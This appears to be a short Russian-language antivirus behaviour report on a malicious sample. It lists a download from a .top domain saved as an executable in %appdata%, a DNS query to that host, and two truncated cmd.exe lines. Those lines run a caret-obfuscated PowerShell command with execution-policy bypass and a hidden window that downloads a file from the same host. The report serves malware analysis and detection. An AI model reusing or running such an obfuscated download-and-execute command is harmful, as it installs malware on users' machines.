Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWERsHELl.EXE ^-^E^xEc^U^Ti^oNPo^L^Ic^y B^yp^Ass -nO^pR^O^fil^e^ -^WI^nD^ow^s^t^yl^e ^h^Id^De^N^ (neW^-^oB^JEc^T^ ^sy^Ste^M.n^e^t^.^W^E^BcL^I^Ent).^d^Ow^N^LOaDF^i^Le('http://toag...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "P^OWERsHELl.EXE ^-^E^xEc^U^Ti^oNPo^L^Ic^y B^yp^Ass -nO^pR^O^fil^e^ -^WI^nD^ow^s^t^yl^e ^h^Id^De^N^ (neW^-^oB^JEc^T^ ^sy^Ste^M.n^e^t^.^W^E^BcL^I^Ent).^d^Ow^N^LOaDF^i^Le('http://toag...' (со скрытым окном)